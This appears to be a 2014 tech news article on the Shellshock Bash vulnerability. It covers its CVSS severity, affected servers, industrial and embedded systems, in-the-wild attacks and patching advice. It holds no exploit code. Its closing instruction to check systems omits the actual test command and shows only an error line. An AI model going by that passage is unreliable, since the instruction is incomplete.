14 DAY TRIAL // The bug discovered in GNU Bash, the default command shell in many Linux and Unix-based operating systems, has been making the headlines all week, and for good reason.
Security experts have dubbed it Shellshock, with the clear intention of making a pun, especially since the glitch has been marked with the maximum severity score of 10 using the Common Vulnerability Scoring System (CVSS); this is the standard method for quantifying the severity of computer vulnerabilities, used by a large number of organizations.
Nastier than Heartbleed on all levels
To get an idea of how bad Shellshock is, you should know that Heartbleed, despite the massive attention it received and the racket it created, achieved a measly score of 5, being labeled as a medium risk threat, with an impact subscore of 2.9; exploitability, on the other hand, received the highest mark of 10.
The exploitability and impact subscores from CVSS for Shellshock (CVE-2014-6271) were both 10, which means that the glitch is not only easy to take advantage of, but it can also be leveraged to gain complete access to information on the affected system, authentication not being required.
The flaw consists in the fact that Bash executes any commands attached at the end of a variable function. Since it affects versions 1.14 through 4.3 of the command shell, Shellshock has been present for more than 20 years in the command-line tool.
Lots of systems are affected
Over time, Linux has been adopted for a wide number of devices, and GNU Bash is also available in plenty of them, rendering them vulnerable to attacks exploiting Shellshock.
Among the biggest concerns are Unix-based web servers that run CGI scripts to generate dynamic content. Attacks in the wild have already been recorded and their number only increased since the vulnerability was publicly disclosed, on Wednesday.
Initially, Sucuri saw scans that searched for vulnerable servers, an activity not at all uncommon when a flaw is uncovered, as security researchers and administrators run checks on their machines.
Later on, the security firm’s monitoring systems picked malicious attempts by the thousands, some of them trying to install remote command shells.
“As we started to scan our clients’ sites (and the Internet as a whole) we found that about 2.9% of all sites we scanned were vulnerable to this problem [Shellshock],” Daniel Cid from Sucuri said. “When we talk about millions of websites online, 2.9% is a lot,” he added.
Gaining control over a web server enables attackers to compromise websites hosted there and then target visitors using threats compatible with their operating systems, from PCs running Windows to mobile phones powered by Android.
However, web servers are not the only great concern, as Bash is also found in Linux OSes installed on industrial control systems (ICS) used in critical infrastructures. These are also at risk of falling victims to a malicious actor, especially since they’re generally employed well beyond the lifetime of the operating system powering them.
Patching them up so that the Bash vulnerability is closed, is more difficult than one would think because in some cases the ICS run on Linux versions that have been designed not to be upgraded or their life cycle has ended and are no longer maintained by the developer.
Furthermore, since they are part of critical infrastructures, any downtime costs money; as such, applying the fix for Bash, if possible, has to be done during a scheduled maintenance window. Until then, the systems remain open to exploitation.
Shellshock affects embedded devices as well, some of the most common being routers and access points. Basically, any device with a vulnerable version of Bash on it can be taken over through an application that passes functions to the shell.
Updating is highly recommended
Although patches have been delivered for some Linux distros, it is a well-known fact that affected systems are not immediately immunized against a threat. In the case of Heartbleed, plenty of servers were still at risk months after the fix had been issued; many systems still are.
Apple’s OS X is also affected by the Bash bug, but the company said that only a small part of users are at risk because “systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services.” In other words, only advanced users should be more worried. Apple is readying a fix, though.
Taking this into consideration, it is not far-fetched to believe that malware authors will include automatic testing of the targeted systems for the Shellshock vulnerability.
The bottom line is that users and especially system administrators should apply the fixes for Shellshock as soon as they become available for the vulnerable devices, be they personal computers, servers or embedded devices.
Systems can be checked for the Bash bug by entering the following string in the terminal:
bash: error importing function definition for `x'
Shellshock
Shellshock
